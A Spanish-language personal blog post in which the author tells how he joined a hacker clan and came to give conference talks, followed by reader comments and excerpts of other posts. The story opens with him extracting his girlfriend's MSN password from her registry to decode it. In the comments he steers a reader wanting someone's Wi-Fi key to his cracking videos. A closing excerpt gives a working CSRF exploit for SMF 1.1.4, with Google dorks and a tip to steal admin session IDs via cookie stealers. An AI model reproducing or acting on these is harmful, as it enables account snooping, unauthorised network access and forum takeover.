Ir al contenido principal

Superacion Personal

Bueno aqui un poco mas de la historia de mi vida :-D aqui vamos espero no aburrirlos jejej como en los otros posts que he puesto :-P yaque este por lo que veo sera un poco largo, si lo leen todo dejen un comentario jejeje :-P

El comienzo

1o (Primero) de junio del 2006

Muahahahaha tengo el pass del msn de mi novia encriptado en hexadecimal, lo unico malo es que no secomo hacer para "descifrar" eso, vamos a buscar en internet, O aqui hay una pagina que se ve interesante, vamos a entrar.

Se ve que si ayudan a la gente, hay muchos usuario que ayudan y demas :-O genial me voy a registrar para preguntarles haber si saben como "descifrar" el pass en hexa

---------------------------------------------------------------
Nota:
Lo tenia en hexadecimal por que mi novia guardaba el pass en su pc, entonces quedaba guardado en el registro de lindows...
---------------------------------------------------------------

Pregunta:

Alguien me puede ayudar en descifrar esto:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

es el pass de un msn que lo saque del regedit y pss no tengo ni ideade como hacerlo...

Respuesta:

no msn es de lammers

Pensamiento:

pero pero pero no es msn es un hexa..... weno ya que :-P

en una de esas veo en un post el titulo de un user:

Clan PRHackers Union

:-O :-O :-O yo quiero estar en un clan de hackers

ese mismo dia mando un mp al usuario que tenia ese titulo:

Hola puedo entrar a su clan??? que hago??? que necesito???

Respuesta:

No psss lo unico es aprender y no se pide se da, si vemos que sabes te metemos, tu solo dedicate aaprender

Pensamiento:

weno pss si tienen razon....

Pasa el tiempo aprendo y demas, consigo mi titulo de Clan PRHackers Union pfff que felicidad jejejej :-D

El Intermedio

(2006 Mediados de Agosto)
weno paso el tiempo y conoci a _ANtrAX_ un bune amigo hasta la fecha, pasael tiempo y un dia me dice voy a dar ponencia a México en Tuxtla Gutierrez y yo asi de :-O genial ya quisiera dar una ponencia yo pero no se ni madres xD cuando estubo aqui en México recuerdo le comente pfff ami me faltan años para que pueda dar una ponencia....

(2007 Mediados de Febrero)
despues pasa algo mas de tiempo y conosco a AzRaEL amigo hasta la fecha tambien y me dice pss voy a dar una ponencia en el CONSOL si quieres ahi nos conocemos y yo asi de nuevo :-O quisiera dar una ponencia tambien :'(

El Final ( De este post no de la historia, a esto aun le faltan años (espero) jejej :-D)

(2007 Mediados de Agosto)
weno pasa mas tiempo aun y el 2007 un amigo me recomienda para dar ponencia en Tuxtla Gutierrez donde el año pasado antrax dio una ponencia, mando mis papeles y todo y psss doy un taller en tuxtla gutierrez :-D pffff que felicidad me dio ese dia :-D

regreso y todo y un amigo me comenta que ya a va a ser el CONSOL y digo ahhh caray yo recuerdo ese nombre de donde de donde, ahhhh si ya ya ya, y me dice por que no mandas tu solicitud haber si la aceptan, con un poco mas de confianza en mi digo pss bueno nada pierdo, mando mi solicitud y demas y ahora me responden que mi ponencia esta a punto de ser aceptada y que solo mande mis docs para que los revisen :-D

jojojojo y llega el momento en que me siento feliz y veo que he ocupado mi tiempo en algo de provecho y pss como siempre he dicho de auqi en adelante mas aun, aun hay muchas muchisisisisissisismas cosas que me faltan por aprender y pss a eso voy primero Dios :-D

Komtec1

Comentarios

GastoNike ha dicho que…
Esas son de las cosas que animan a uno a seguir adelante jeje... y ps tu eres de los que más rápido han avanzado en esto, da gusto y espero que te vuelvas alguien grande, más de lo que ya eres ;)

Saludos.
Neri ha dicho que…
Komtec, las cosas salen, y mas siendo una persona como vos que nunca se niega a ayudar y a tratar de responder las dudas, y siempre con " buena onda"..ojala todos los dias se encontraran personas como vos km.
Un abrazo, que andes bien y nos leemos ;)
Neri
diaz ramirez jose eliu ha dicho que…
necesito tu ayuda!!!

mira lo k pasa es k estado buscando como tener internet inalambrico tengo megared en mi casa y la laptop detecta una red pero me pide clave he tratado de usar todos los programas k encontrado pero no entiendo podrias hacer un buen tuto de como poder hacer esto pork los demas estn algo confusos ninguno mi laptpop es una compaq presario v3000 windows vista 802.11 b/g wlan porfa ayuda
Komtec1 ha dicho que…
man aqui en mi blog deje los videos de como puedes hacerlo, descargalos chekalos y despues si no puedes pss solo pides mas ayuda :-)

Komtec1
ShuNIX ha dicho que…
Una historia en verdad alentadora, hay planes de este lado para ir al CONSOL espero y se pueda dar un encuentro por allá.

Por cierto, los colores que usas en tu blog son algo especiales, tengo que seleccionar el texto para leerlo :(
ShuNIX ha dicho que…
Perdón, lo del texto era porque no me cargó la imágen de fondo :$

Pero, muy loco (bueno) el texto xD. Estamos en contacto hermano
Komtec1 ha dicho que…
jejejejej que onda bro como andas, en el CONSOL no creo que nos veamos, jejejeje por que no mande mis papeles a tiempo xD y psss no aceptaron la ponencia jajajjaj xD pero weno ya que ni pex, sera para el otro año :-D aun asi si vienes pssss por aqui nos andamos viendo, si no hay donde llegaraqui tienen casa man, dos creo se quedaran aqui, y pss lo que necesites por aqui andamos :-D

Saludos

Entradas populares de este blog

Solución [fix] a hamachi Logging in .. failed, busy

Hola!

Aquí con una pequeña entrada, pero que a más de uno le será útil.

Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema:

usuarioserver@server:~$ sudo hamachi login
[sudo] password for usuarioserver:
Logging in .. failed, busy

Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos: 
sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f
Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder. 
Para solucionar ese problema, basta con hacer un: 
sudo /etc/init.d/logmein-hamachi force-reload
Esto forzará el reinicio de hamachi, y así después hacen: 
sudo hamachi login
Y listo, el problema de failed busy desaparece y los deja loguear bien en la red de hamachi. 
Espero les sirva! :D 
Saludos 
Komtec…

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma.

Así que pues ya comentada la información de arriba les paso a dejar un ejemplo.

Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps:


<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false&language=es"></script>En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta)El lenguaje declaramos español, esto es para los menús que se van a mostrar en el mapa. Una vez que tenemo…

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| …